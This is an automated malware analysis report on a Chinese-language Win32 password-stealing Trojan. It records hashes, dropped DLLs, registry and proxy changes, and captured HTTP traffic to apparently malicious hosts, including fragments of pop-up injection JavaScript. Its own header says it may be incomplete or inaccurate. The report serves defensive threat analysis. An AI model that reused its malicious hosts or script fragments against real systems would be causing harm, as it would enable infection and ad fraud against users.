Gen.Variant.Strictor.70570_bce5185cd6

by malwarelabrobot on March 23rd, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Strictor.70570 (B) (Emsisoft), Gen:Variant.Strictor.70570 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: bce5185cd6bcfb15ea413b2870904564
SHA1: fe60dcb09257e2fbc85cc08508bef11e1536bab5
SHA256: 9739e06e111c6f213e67517a0d3cf14c40695b57073d5c01814c1bcce6670c74
SSDeep: 24576:23MMjuiZd4rfbCbg2acawU9txGoF6BhBsYSUNMuITpwTZaqdiXSp0c02uFG6dAk8:2Ng7txKBPeUzBTZaqdwk0c05HGi JJ7
Size: 2351104 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-09-02 15:15:09
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users' passwords.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3404

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G8CYUMX5.txt (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXGBCMD7.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZW2X1AZ.txt (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxs11[1].htm (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxszgg1[1].htm (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
C:\dc.dll (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssxs13[1].htm (508 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssxs12[1].htm (1283 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017032220170323\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ssxsz[1].htm (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2KZT5IAY.txt (76 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1461 bytes)
C:\SkinH_EL.dll (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GZOJPSMC.txt (233 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssggd[1].htm (106 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2KZT5IAY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101320161014\index.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101320161014 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZW2X1AZ.txt (0 bytes)

Registry activity

The process %original file name%.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFormatTags" = "2"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"aFormatTagCache" = "01 00 00 00 10 00 00 00 55 00 00 00 1E 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CachePrefix" = ":2017032220170323:"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017032220170323"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFilterTags" = "0"
"fdwSupport" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016101320161014]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\SkinH_EL.dll
f803ad370a8649a143429f179af5f3ab c:\dc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??????????????
Product Name: ??????????????
Product Version: 4.4.0.0
Legal Copyright: ??????????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.4.0.0
File Description: ??????????????
Comments: ??????????????
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 970229 970752 4.52493 882e1d6a4d0017a9879d47b74c0635e7
.rdata 974848 1249212 1249280 5.16012 5fcf6c33b35812e3412d866b620faa03
.data 2224128 365898 90112 3.54456 e90c0ce56c63695ac986b82f08626ee2
.rsrc 2592768 32960 36864 3.55108 37ff9cd91594fbeb59b4863ab563a374

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /ad/ssxs13.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 508
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxs13.htm
Last-Modified: Thu, 26 Nov 2015 07:34:50 GMT
Accept-Ranges: bytes
ETag: "e0a720ef1c28d11:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>....<............................</body>..</htm
l>..

<<< skipped >>>

GET /close.php?uid=1130 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxs12.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: popup.jointreport-switch.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: tengine
Date: Wed, 22 Mar 2017 01:07:57 GMT
Content-Type: text/html; charset=gb2312
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.28
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache, must-revalidate
Set-Cookie: lgPTN20963270664410=0; expires=Wed, 22-Mar-2017 16:00:00 GMT; path=/; domain=.jointreport-switch.com
222f..(function() {..    var popUrl = 'hXXp://popup.jointreport-switch
.com/jointreport_process.php?ap=MjE2Mnw1ODhlMWM3OTA4ZWQ1YzliM2FmZmY0MG
Q4Zjg2YzAwZWZkNw==';.. var lgUnionPushUrl = CrazyInitUrl(popUrl);..
function CrazyInitUrl(urls){.. var sf=0,sc=0,ol='',sd=0;..
var ae = function(p) {.. v = false;.. doc
ument.write('<SCRIPT LANGUAGE=VBScript>\n on error resume next \
n v = IsObject(CreateObject("' p '"))<\/SCRIPT>\n');..
if(v){.. return '1';.. }else{..
return '0';.. }.. };.. var af = function
(p) {.. var m = '';.. for (var i=0; i < navig
ator.mimeTypes.length; i ){.. m = navigator.mimeTypes
[i].type.toLowerCase();.. }.. v = '0';..
if (m.indexOf(p) != -1){.. if (navigator.mimeTypes[
p].enabledPlugin != null) v = '1';.. }.. return
v;.. };.. var __dm = (navigator.appName.indexOf("Netsca
pe") != -1);.. var __di = (navigator.userAgent.toLowerCase().i
ndexOf("msie") != -1);.. var __dw = ((navigator.userAgent.toLow
erCase().indexOf("win")!=-1) || (navigator.userAgent.toLowerCase().ind
exOf("32bit")!=-1));.. if(__dw && __di) sf = ae("ShockwaveFlash
.ShockwaveFlash.1");.. if(!__dw || __dm) fs = af("application/x
-shockwave-flash");.. if(navigator.appName=="Netscape"){..
ol = navigator.language.substr(0,2);.. }else{..

<<< skipped >>>

GET /setup/ssxczgg2269.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ad.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Content-Length: 4435
Content-Type: text/html
Server: IIS
Date: Wed, 22 Mar 2017 01:07:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>................</title>..<style type="text/css">..&l
t;!--..BODY {.PADDING-RIGHT: 0px; PADDING-LEFT: 35px; BACKGROUND: url(
/images/photoback.gif) repeat-x left top; PADDING-BOTTOM: 0px; MARGIN:
0px; FONT: 12px Arial, Helvetica, sans-serif; COLOR: #333; PADDING-TO
P: 35px}..A {.COLOR: #007ab7; TEXT-DECORATION: none}..A:hover {COLOR:
#007ab7; TEXT-DECORATION: none}..A:hover {COLOR: #de1d6a}...hidehr {DI
SPLAY: none}...show12 {PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEF
T: 0px; PADDING-BOTTOM: 0px; MARGIN: 5px 0px; PADDING-TOP: 0px}...show
13 {PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 0px; PADDING-BOT
TOM: 0px; MARGIN: 5px 0px; PADDING-TOP: 0px}...show12 A {.BORDER-RIGHT
: #bfdeed 1px solid; PADDING-RIGHT: 6px; BORDER-TOP: #bfdeed 1px solid
; DISPLAY: inline-block; PADDING-LEFT: 6px; BACKGROUND: #d8ebf4; PADDI
NG-BOTTOM: 2px; OVERFLOW: hidden; BORDER-LEFT: #bfdeed 1px solid; LINE
-HEIGHT: 17px; PADDING-TOP: 2px; BORDER-BOTTOM: #bfdeed 1px solid; HEI
GHT: 16px}...show13 A {.BORDER-RIGHT: #bfdeed 1px solid; PADDING-RIGHT
: 6px; BORDER-TOP: #bfdeed 1px solid; DISPLAY: inline-block; PADDING-L
EFT: 6px; BACKGROUND: #d8ebf4; PADDING-BOTTOM: 2px; OVERFLOW: hidden;
BORDER-LEFT: #bfdeed 1px solid; LINE-HEIGHT: 17px; PADDING-TOP: 2p

<<< skipped >>>

GET /setup/a.html HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Host: ad.51pc114.cn


HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/html
Content-Location: hXXp://ad.51pc114.cn/setup/a.html
Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT
Accept-Ranges: bytes
ETag: "3efdd9d93cadcf1:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:39 GMT
[EhXXp://ad.51pc114.cn/setup/ex.html]..[n101]


GET /go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/ssxs11.htm&vvtime=1490144878746 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxs11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: web.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 22 Mar 2017 01:08:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Tue, 21 Mar 2017 08:28:00 GMT
Set-Cookie: ASPSESSIONIDAQDQDRCC=ICHPJKMAONIHNDIJIIFFLDJL; path=/
Cache-control: private


GET /19059730.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxs11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Encoding: gzip
Last-Modified: Tue, 07 Mar 2017 12:17:14 GMT
Accept-Ranges: bytes
ETag: "c1c17cc13c97d21:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
Date: Wed, 22 Mar 2017 01:07:58 GMT
Content-Length: 972

<<< skipped >>>

GET /ad/ssxs12.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 1283
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxs12.htm
Last-Modified: Fri, 09 Dec 2016 13:25:51 GMT
Accept-Ranges: bytes
ETag: "aa9133c31f52d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>......................<script language='javascript'>.
.// ..................html............var random = {...ad_num : 3,...i
nit : function(){....n = (Math.floor(Math.random()*random.ad_num 1));.
...switch(n){.....case 1:......document.writeln('<script src=\"http
:\/\/p.rhgw.net\/code\/popjs.asp?pid=258920\" charset=\"gb2312\">&l
t;\/script>');.....break;.....case 2:......document.writeln('<sc
ript type=\"text\/javascript\" src=\"http:\/\/popup.jointreport-switch
.com\/close.php?uid=1130\"><\/script>');.....break;.....case
3:......document.writeln('<script language=\"javascript\" src=\"htt
p:\/\/u291014.778669.com\/fclose.php?id=180495\"><\/script>')
;.....break;....}...}..}..random.init();..</script>....<scrip
t language="javascript" src="hXXp://u291014.778669.com/fclose.php?id=1
52695"></script>..........</body>..</html>..t>....

<<< skipped >>>

GET /setup/ssxsz.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/setup/ssxsz.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 3
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/setup/ssxsz.htm
Last-Modified: Thu, 09 Mar 2017 06:09:42 GMT
Accept-Ranges: bytes
ETag: "e46a71be9b98d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
5.2


GET /1522895/tongji.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxszgg1.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.tongji.linezing.com
Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable
Server: Tengine
Content-Length: 0
Connection: keep-alive
Via: cache30.l2hk1[0,503-0,M], cache18.l2hk1[10016,0], cache8.it1[10661,503-0,M], cache7.it1[30000,10661,504001]
Age: 0
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 22 Mar 2017 01:08:37 GMT
X-Swift-CacheTime: 1
Timing-Allow-Origin: *
EagleId: 2f59411814901448766361688e


GET /ad/ssggd.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/ad/ssggd.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 106
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssggd.htm
Last-Modified: Fri, 06 Jan 2017 15:11:59 GMT
Accept-Ranges: bytes
ETag: "147f493a2f68d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:41 GMT
................................................4.9...................
.........,..........................



GET /ad/ssxs11.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 825
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxs11.htm
Last-Modified: Mon, 16 Jan 2017 15:57:20 GMT
Accept-Ranges: bytes
ETag: "070cb371170d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:41 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>..............................<script language="javascri
pt" type="text/javascript" src="hXXp://js.users.51.la/19059730.js">
</script>..<noscript><a href="hXXp://VVV.51.la/?1905973
0" target="_blank"><img alt="我要啦免费统计" src="hXXp://img.users.51.la/19059730.asp" style
="border:none" /></a></noscript>....</body>..<
/html>..



GET /ad/mcgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/mcgg.htm
Last-Modified: Thu, 28 Mar 2013 03:33:01 GMT
Accept-Ranges: bytes
ETag: "8222f3642bce1:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:41 GMT
<meta HTTP-EQUIV=REFRESH CONTENT="0;URL=hXXp://ad.7532.com/ad/mcgg4
56.htm">



GET /ad/ssxszgg1.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 2915
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxszgg1.htm
Last-Modified: Fri, 06 Jan 2017 15:12:34 GMT
Accept-Ranges: bytes
ETag: "8c63f64e2f68d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>.. <br />..<font size="2" color="red"><a hr
ef="hXXp://url.cn/OGLodN" target="_blank">................28......
............:</a></font><font size="2" color="red">
..<br />..<font size="2" color="blue"><a href="hXXp://
km.7532.com" target="_blank">............1-3........1........10..4
..................1-10......................7532......</a></f
ont><font size="2" color="blue"><br />..<br />..
<a href="hXXp://VVV.7532.com/" target="_blank" ..style="color:#0000
ff"><strong>..<br />...................................
.....4.9............................,..........................</st
rong></a>..<br />..<a href="hXXp://VVV.7532.com/" ta
rget="_blank" ..style="color:#ff0000"><strong>........<br
/>..<br />..1........................,....................<
;br />..2..........................................................
.......</strong></a>....<br />....<br />..

<<< skipped >>>

GET /1435675/tongji.js HTTP/1.1
Accept: */*
Referer: hXXp://ad.7532.com/ad/mcgg456.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.tongji.linezing.com
Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable
Server: Tengine
Content-Length: 0
Connection: keep-alive
Via: cache34.l2hk1[0,503-0,M], cache1.l2hk1[10023,0], cache10.it1[10679,503-0,M], cache3.it1[30000,10679,504001]
Age: 0
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 22 Mar 2017 01:08:38 GMT
X-Swift-CacheTime: 1
Timing-Allow-Origin: *
EagleId: 2f59410314901448775867203e


GET /4473463.js HTTP/1.1
Accept: */*
Referer: hXXp://ad.7532.com/ad/mcgg456.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1872
Content-Type: application/x-javascript
Last-Modified: Tue, 07 Mar 2017 03:16:45 GMT
Accept-Ranges: bytes
ETag: "6cedff3ff196d21:5590"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 22 Mar 2017 01:07:36 GMT
Connection: close

GET /ad/gjgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
